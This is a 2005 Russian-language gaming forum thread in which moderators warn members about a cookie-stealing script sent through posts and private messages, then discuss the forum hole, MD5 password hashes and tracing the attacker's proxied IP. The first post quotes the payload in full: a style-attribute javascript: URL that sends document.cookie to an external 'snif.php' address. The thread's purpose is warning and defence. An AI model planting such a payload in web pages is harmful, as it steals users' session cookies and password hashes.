!ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!, ВАШИХ ПАРОЛЕЙ |
Здравствуйте, гость ( Вход | Регистрация )
!ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!, ВАШИХ ПАРОЛЕЙ |
Oct 25 2005, 17:35
Сообщение
#1
|
|
Ушедший на войну Класс: Маг Характер: Chaotic Good Раса: Человек NWN: Контент |
Если вам опера выдает в постах или в любой точке форума что-то типа:
` style=`background:url(javaSCript:document.images[1].src="http://runiverse.net/forum/images/avatars/xxx/snif.php?"+document.cookie)` Или по ПМ, или в любом виде - немедленно сообщите об этом Айвану, ДБКолу или любому супермодератору, чтобы автор этих сообшений был забанен. Этот скрипт опасен. Он похищает ваши пароли. |
Oct 25 2005, 18:04
Сообщение
#2
|
|
Level 5 Класс: Обыватель Характер: Lawful Neutral Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
Был замечен wasd.
|
Oct 25 2005, 18:10
Сообщение
#3
|
|||
Отверженный Класс: Теневой Танцор Характер: Neutral Good Раса: Баатезу |
очередная дырь оперы? или форума? |
||
Oct 25 2005, 18:20
Сообщение
#4
|
|
Ищущий Класс: Рейнджер Характер: Lawful Neutral Раса: Эльф ПОДМАСТЕРЬЕ |
Так-с-с...
1.Ошибка оперы или форума? 2. Это может быть в любом посту и стпром в том числе? |
Oct 25 2005, 18:31
Сообщение
#5
|
|
Level 5 Класс: Обыватель Характер: Lawful Neutral Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
мне пришло на пм. Я добанил его до 100 (Леон уже 20 поставил до этого) и на всяк сменил пасс.
|
Oct 25 2005, 18:42
Сообщение
#6
|
|
Level 11 Класс: Клерик Характер: Chaotic Good Раса: Полуэльф NWN: DM |
В других браузерах скрипт просто ворует у вас пароли и все...
А Опера блокирует. И видно кусочек оного. |
Oct 25 2005, 18:45
Сообщение
#7
|
|
Ищущий Класс: Рейнджер Характер: Lawful Neutral Раса: Эльф ПОДМАСТЕРЬЕ |
Говорит о крутости Оперы и о дыре в форуме. Что за ник то был у атакующего?
|
Oct 25 2005, 18:53
Сообщение
#8
|
|
Level 5 Класс: Страж Тьмы Характер: Chaotic Neutral Раса: Дракон NWN: Скриптинг [PW] |
У нормальный людей JS is disabled :D
|
Oct 25 2005, 18:57
Сообщение
#9
|
|||
Отверженный Класс: Теневой Танцор Характер: Neutral Good Раса: Баатезу |
... свеженький фф ;) |
||
Oct 25 2005, 19:02
Сообщение
#10
|
|||
Level 5 Класс: Обыватель Характер: Lawful Neutral Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
а мне кусок пришел. Правда скрипты отключены. |
||
Oct 25 2005, 20:00
Сообщение
#11
|
|
Собирательница ушей Класс: Оборотень Характер: Lawful Evil Раса: Человек NWN: Тестер Проклятие Левора |
Не знаю,не знаю..в ИЕ тоже виден кусок.
|
Oct 25 2005, 20:07
Сообщение
#12
|
|
Epic Level Класс: Бард Характер: Chaotic Neutral Раса: Животное МАСТЕР Пера |
А если FireFox? Что ж мне теперь - все пароли менять?.. :vava: Кто выпустил скрипт на волю? Ворует он пароли вообще их сохраненных - или только для форума?
Сообщение отредактировал Валеско - Oct 25 2005, 20:08 |
Oct 26 2005, 00:44
Сообщение
#13
|
|||
Пингвиноид Класс: Обыватель Характер: True Neutral Раса: Человек |
Скрипт ворует кукисы, один из кукисов называется pass_hash В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного. Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство... Добавлено в 01:55 Добавлю... Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию. Добавлено в 02:09
Это говорит об убогости Оперы и кривости рук писателей форума (на наше счастье, в IPB2 уже хранятся произвольно хэшированные пароли) А по поводу Оперы: document.cookie описан в стандарте w3c, является нормальной штатной фишкой и "на ура" поддерживается IE и Mozilla/Firefox/Konqueror. Опера, блин, как всегда "впереди планеты всей". :( А то, что document.cookie воспользовались в таких целях - так это и кухонным ножом можно мирно хлеб нарезать, а можно и зарезать кого... |
||
Oct 26 2005, 08:03
Сообщение
#14
|
|
Level 9 Класс: Клерик Характер: Chaotic Evil Раса: Человек |
Дырка для закрытия глюка с несанкционированным получением паролей пользователей форума уже давно разжована в инете... Советую поискать и исправить код.
|
Oct 26 2005, 15:49
Сообщение
#15
|
|||||||||
Миловидный Бегрюссунг Класс: Воин Характер: Chaotic Good Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
Я еще вчера глядя на стрейф-ник думал мож квакер какой :D Интуиция не подвела. Но не стал банить... Добавлено в [mergetime]1130331840[/mergetime]
Добавлено в [mergetime]1130332325[/mergetime]
Добавлено в [mergetime]1130332416[/mergetime] Картинка отседова...
|
||||||||
Oct 26 2005, 16:16
Сообщение
#16
|
|||
Level 5 Класс: Обыватель Характер: Lawful Neutral Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
короче чел хотел акки супермодеров и админов. |
||
Oct 26 2005, 16:34
Сообщение
#17
|
|
Epic Level Класс: Бард Характер: Chaotic Neutral Раса: Животное МАСТЕР Пера |
Айв, судя по всем это прокси. Кому бы из Китая наши пароли понадобились? Но прокси довольно легко пробиваются. Если хочешь могу народ поспрашивать как - получим настоящий ай-пи.
|
Oct 26 2005, 17:19
Сообщение
#18
|
|
Ищущий Класс: Рейнджер Характер: Lawful Neutral Раса: Эльф ПОДМАСТЕРЬЕ |
А разве через посты ай-пи не прбить? Я не думаю, что он его как-то изменял или скрывал. Тем-более, что интернет карт ай-пи меняется каждый раз... Валеско, идея хорошая, но не спасёт.
|
Oct 26 2005, 18:05
Сообщение
#19
|
|||
Epic Level Класс: Бард Характер: Chaotic Neutral Раса: Животное МАСТЕР Пера |
Скрывал. Явно через прокси. Ну не верю я что какой-то китаец тут письма рассылал! А бота создавать и запускать через форумы... ну не знаю - маловероятно. Скорее кто-то просто юзает прокси. Зная его ай-пи, пусть с разных карточек, можно по настоящему провайдеру вычислить город где живет. Народу нам "сочувствующего" не так много, чтобы потом гадать, а то что это левак я сомневаюсь. Кому мы нужны? |
||
Oct 26 2005, 18:05
Сообщение
#20
|
|||||
Level 5 Класс: Обыватель Характер: Lawful Neutral Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
пробить. Читай пост Айва. Тока если чел юзает Высоко Анонимный Прокси сервер, то дальше этого сервака отследить сложно.
а если у него выделенка? или локалка со статичным ИП на выходе? |
||||
Oct 26 2005, 18:07
Сообщение
#21
|
|
Миловидный Бегрюссунг Класс: Воин Характер: Chaotic Good Раса: Человек NWN: Модмейкер Проклятие Левора Порядок Времени |
Заплатки нет пока. так что не сохраняйте пасс свой. И если увидите такое письмо, сразу мне имя писаря в пм...
Постов у него нет. Так что ипи тока такой. |
Oct 27 2005, 16:24
Сообщение
#22
|
|
Level 19 Класс: Обыватель Характер: True Neutral Раса: Дварф NWN: Контент |
к слову...
http://droaam.nm.ru/images/hak-lam.jpg |
Oct 27 2005, 16:32
Сообщение
#23
|
|||||
Ищущий Класс: Рейнджер Характер: Lawful Neutral Раса: Эльф ПОДМАСТЕРЬЕ |
Так делать глуповато. Намного легче воспользоваться чем-то временным. К примеру купить карту или послать письмо из того-же интернет клуба.
А в сообщении на ПМ ай-пи не пишется? Ведь это вроде можно сделать... |
||||
Oct 27 2005, 21:21
Сообщение
#24
|
|
Level 19 Класс: Обыватель Характер: True Neutral Раса: Дварф NWN: Контент |
|
Текстовая версия | Сейчас: 28th March 2024 - 15:28 |